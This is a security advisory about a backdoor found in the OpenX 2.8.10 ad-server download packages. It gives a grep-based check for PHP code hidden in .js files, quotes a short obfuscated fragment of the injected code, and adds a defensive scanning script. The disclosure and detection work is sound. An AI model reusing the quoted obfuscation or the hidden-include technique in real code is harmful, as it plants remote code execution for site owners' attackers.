OpenX-2.8.10 backdoor

2013.08.07
Credit: xclose
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


Overall CVSS score: 7.5/10
Impact: 6.4/10
Exploitability: 10/10
Required access: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Backdoor in current download packages of OpenX-2.8.10 (06.08.13)

By accident we stumbled across what seems to be a backdoor in the download archive (.zip, .bz2, .tgz) of the current version of the OpenX software. It allows arbitrary PHP code to be executed remotely. The problem is currently exploited in the wild. This is critical and needs immediate reaction.

If you're the admin of an OpenX adserver, you can verify whether your installation contains the backdoor:

    find . -name \*.js -exec grep -l '<?php' {} \;

When you get a result, it is the infected code:

    this.each(function(){l=flashembed(this,k,j)} {jQuery.tools=jQuery.tools||{version: {}};jQuery.tools.version.flashembed='1.0.2'; */$j='ex'./**/'plode'; /* if(this.className ...

In combination, another part of manipulated code uses require_once() instead of file_get_contents() to serve it.

If you're not serving videos, you can get rid of the infected plugin by deleting the plugin openXVideoAds.

For the German version see: http://www.heise.de/security/meldung/Achtung-Anzeigen-Server-OpenX-enthaelt-eine-Hintertuer-1929769.html

Update: The OpenX security team has removed the infected packages and is working on an advisory.
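The two indicators described above (PHP code inside a .js file, and a PHP file that pulls a .js file in with require_once() instead of reading it as data) can be checked together. The script below is an added example, not code from the advisory or from OpenX; the function names, the include/require regular expression and the sample tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the advisory): check a web root for both indicators.

# Indicator 1, the advisory's own check: .js files containing a PHP open tag.
find_js_with_php() {
    find "$1" -type f -name '*.js' -exec grep -l '<?php' {} \;
}

# Indicator 2 (heuristic assumed by this example): PHP files whose
# include/require statement names a quoted path ending in .js.
find_php_including_js() {
    find "$1" -type f -name '*.php' -exec \
        grep -lE "(include|require)(_once)?[^;]*\\.js['\"]" {} \;
}

# Print one tagged line per finding; return 1 if anything was flagged.
scan_tree() {
    js_hits=$(find_js_with_php "$1")
    php_hits=$(find_php_including_js "$1")
    [ -z "$js_hits" ] || printf '%s\n' "$js_hits" | sed 's/^/JS_WITH_PHP /'
    [ -z "$php_hits" ] || printf '%s\n' "$php_hits" | sed 's/^/PHP_INCLUDES_JS /'
    [ -z "$js_hits$php_hits" ]
}

# Constructed sample tree (file names and contents are made up for the demo).
make_sample_tree() {
    mkdir -p "$1/plugins" "$1/www"
    printf 'var a = 1;\n' > "$1/plugins/clean.js"
    printf 'var b = 2; /* <?php echo 1; ?> */\n' > "$1/plugins/tainted.js"
    printf '<?php echo file_get_contents("player.js");\n' > "$1/www/serve_ok.php"
    printf "<?php require_once 'tainted.js';\n" > "$1/www/serve_bad.php"
}

# Usage: sh scan.sh /path/to/openx   (exit status 1 means findings were printed)
if [ "$#" -gt 0 ]; then scan_tree "$1"; fi
```

A hit on the second indicator is only a lead to review by hand, since a comment or string that mentions a .js path in an include statement will also match.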

References:

http://xclose.de/wordpress/268/backdoor-in-current-download-packages-of-openx-2-8-10



Copyright 2024, cxsecurity.com

 
